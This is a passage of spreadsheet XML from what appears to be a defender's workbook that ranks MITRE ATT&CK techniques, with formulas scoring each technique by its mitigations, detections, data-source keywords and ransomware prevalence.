        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I482">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J482">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K482">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L482">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M482" s="25">
        <v>0</v>
      </c>
      <c r="N482" s="51">
        <v>0</v>
      </c>
      <c r="O482" s="51">
        <v>0</v>
      </c>
      <c r="P482" s="51">
        <v>0</v>
      </c>
      <c r="Q482" s="51">
        <v>0</v>
      </c>
      <c r="R482" s="51"/>
      <c r="S482" s="51">
        <v>0</v>
      </c>
      <c r="T482" s="52" t="s">
        <v>1747</v>
      </c>
      <c r="U482" s="51">
        <v>0</v>
      </c>
      <c r="V482" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W482">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X482">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y482">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z482">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA482">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB482">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC482" s="29" t="s">
        <v>1260</v>
      </c>
      <c r="AD482" s="25" t="str" cm="1">
        <f t="array" ref="AD482">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC482)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE482" s="25">
        <f>IF(AD482="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF482" s="25" t="str" cm="1">
        <f t="array" ref="AF482">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC482)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG482" s="25">
        <f>IF(AF482="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH482" s="25" t="str" cm="1">
        <f t="array" ref="AH482">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC482)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI482" s="25">
        <f>IF(AH482="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ482" s="25" t="str" cm="1">
        <f t="array" ref="AJ482">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC482)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK482" s="25">
        <f>IF(AJ482="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL482" s="25" t="str" cm="1">
        <f t="array" ref="AL482">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC482)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM482" s="25">
        <f>IF(AL482="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN482" s="51"/>
      <c r="AO482" s="51"/>
      <c r="AP482" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ482" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR482" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS482" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT482" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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83" spans="1:47" ht="32.1">
      <c r="A483" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B483" s="25">
        <f>SUM(H483,M483,V483)*(1+SUM(AE483,AG483,AI483,AK483,AM483))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C483" s="25" t="s">
        <v>1748</v>
      </c>
      <c r="D483" s="25" t="s">
        <v>1749</v>
      </c>
      <c r="E483" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F483" s="51">
        <v>1</v>
      </c>
      <c r="G483" s="51">
        <v>1</v>
      </c>
      <c r="H483" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I483">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J483">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K483">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L483">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M483" s="25">
        <v>0</v>
      </c>
      <c r="N483" s="51">
        <v>0</v>
      </c>
      <c r="O483" s="51">
        <v>0</v>
      </c>
      <c r="P483" s="51">
        <v>0</v>
      </c>
      <c r="Q483" s="51">
        <v>0</v>
      </c>
      <c r="R483" s="51"/>
      <c r="S483" s="51">
        <v>0</v>
      </c>
      <c r="T483" s="51"/>
      <c r="U483" s="51">
        <v>0</v>
      </c>
      <c r="V483" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W483">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X483">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y483">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z483">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA483">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB483">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC483" s="29" t="s">
        <v>505</v>
      </c>
      <c r="AD483" s="25" t="str" cm="1">
        <f t="array" ref="AD483">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC483)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE483" s="25">
        <f>IF(AD483="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF483" s="25" t="str" cm="1">
        <f t="array" ref="AF483">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC483)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG483" s="25">
        <f>IF(AF483="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH483" s="25" t="str" cm="1">
        <f t="array" ref="AH483">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC483)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI483" s="25">
        <f>IF(AH483="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ483" s="25" t="str" cm="1">
        <f t="array" ref="AJ483">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC483)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK483" s="25">
        <f>IF(AJ483="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL483" s="25" t="str" cm="1">
        <f t="array" ref="AL483">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC483)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM483" s="25">
        <f>IF(AL483="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN483" s="63"/>
      <c r="AO483" s="51"/>
      <c r="AP483" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ483" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR483" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS483" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT483" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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84" spans="1:47">
      <c r="A484" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="B484" s="25">
        <f>SUM(H484,M484,V484)*(1+SUM(AE484,AG484,AI484,AK484,AM484))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C484" s="25" t="s">
        <v>1750</v>
      </c>
      <c r="D484" s="25" t="s">
        <v>1751</v>
      </c>
      <c r="E484" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F484" s="51">
        <v>1</v>
      </c>
      <c r="G484" s="51">
        <v>1</v>
      </c>
      <c r="H484" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I484">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J484">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K484">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L484">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M484" s="25">
        <v>0</v>
      </c>
      <c r="N484" s="51">
        <v>0</v>
      </c>
      <c r="O484" s="51">
        <v>0</v>
      </c>
      <c r="P484" s="51">
        <v>0</v>
      </c>
      <c r="Q484" s="51">
        <v>0</v>
      </c>
      <c r="R484" s="51"/>
      <c r="S484" s="51">
        <v>0</v>
      </c>
      <c r="T484" s="51"/>
      <c r="U484" s="51">
        <v>0</v>
      </c>
      <c r="V484" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W484">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X484">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y484">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z484">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA484">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB484">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC484" s="29" t="s">
        <v>122</v>
      </c>
      <c r="AD484" s="25" t="str" cm="1">
        <f t="array" ref="AD484">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC484)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE484" s="25">
        <f>IF(AD484="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF484" s="25" t="str" cm="1">
        <f t="array" ref="AF484">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC484)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG484" s="25">
        <f>IF(AF484="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH484" s="25" t="str" cm="1">
        <f t="array" ref="AH484">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC484)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI484" s="25">
        <f>IF(AH484="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ484" s="25" t="str" cm="1">
        <f t="array" ref="AJ484">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC484)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK484" s="25">
        <f>IF(AJ484="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL484" s="25" t="str" cm="1">
        <f t="array" ref="AL484">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC484)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM484" s="25">
        <f>IF(AL484="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN484" s="63"/>
      <c r="AO484" s="51"/>
      <c r="AP484" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="AQ484" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR484" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS484" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT484" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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85" spans="1:47" ht="63.95">
      <c r="A485" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B485" s="25">
        <f>SUM(H485,M485,V485)*(1+SUM(AE485,AG485,AI485,AK485,AM485))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C485" s="25" t="s">
        <v>1752</v>
      </c>
      <c r="D485" s="25" t="s">
        <v>119</v>
      </c>
      <c r="E485" s="25" t="s">
        <v>1753</v>
      </c>
      <c r="F485" s="51">
        <v>1</v>
      </c>
      <c r="G485" s="51">
        <v>1</v>
      </c>
      <c r="H485" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I485">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J485">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K485">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L485">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M485" s="25">
        <v>0</v>
      </c>
      <c r="N485" s="51">
        <v>0</v>
      </c>
      <c r="O485" s="51">
        <v>0</v>
      </c>
      <c r="P485" s="51">
        <v>0</v>
      </c>
      <c r="Q485" s="51">
        <v>0</v>
      </c>
      <c r="R485" s="51"/>
      <c r="S485" s="51">
        <v>0</v>
      </c>
      <c r="T485" s="51"/>
      <c r="U485" s="51">
        <v>0</v>
      </c>
      <c r="V485" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W485">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X485">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y485">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z485">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA485">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB485">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC485" s="29" t="s">
        <v>1754</v>
      </c>
      <c r="AD485" s="25" t="str" cm="1">
        <f t="array" ref="AD485">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC485)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE485" s="25">
        <f>IF(AD485="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF485" s="25" t="str" cm="1">
        <f t="array" ref="AF485">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC485)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG485" s="25">
        <f>IF(AF485="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH485" s="25" t="str" cm="1">
        <f t="array" ref="AH485">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC485)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI485" s="25">
        <f>IF(AH485="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ485" s="25" t="str" cm="1">
        <f t="array" ref="AJ485">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC485)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK485" s="25">
        <f>IF(AJ485="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL485" s="25" t="str" cm="1">
        <f t="array" ref="AL485">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC485)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM485" s="25">
        <f>IF(AL485="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN485" s="59">
        <v>0</v>
      </c>
      <c r="AO485" s="51">
        <v>0</v>
      </c>
      <c r="AP485" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ485" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR485" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS485" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT485" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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86" spans="1:47" ht="32.1">
      <c r="A486" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="B486" s="25">
        <f>SUM(H486,M486,V486)*(1+SUM(AE486,AG486,AI486,AK486,AM486))</f>
        <v>0.13300000000000001</v>
      </c>
      <c r="C486" s="25" t="s">
        <v>1755</v>
      </c>
      <c r="D486" s="25" t="s">
        <v>1756</v>
      </c>
      <c r="E486" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F486" s="51">
        <v>1</v>
      </c>
      <c r="G486" s="51">
        <v>1</v>
      </c>
      <c r="H486" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I486">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J486">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K486">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L486">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M486" s="25">
        <v>0</v>
      </c>
      <c r="N486" s="51">
        <v>0</v>
      </c>
      <c r="O486" s="51">
        <v>0</v>
      </c>
      <c r="P486" s="51">
        <v>0</v>
      </c>
      <c r="Q486" s="51">
        <v>0</v>
      </c>
      <c r="R486" s="51"/>
      <c r="S486" s="51">
        <v>0</v>
      </c>
      <c r="T486" s="51"/>
      <c r="U486" s="51">
        <v>0</v>
      </c>
      <c r="V486" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W486">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X486">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y486">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z486">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA486">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB486">
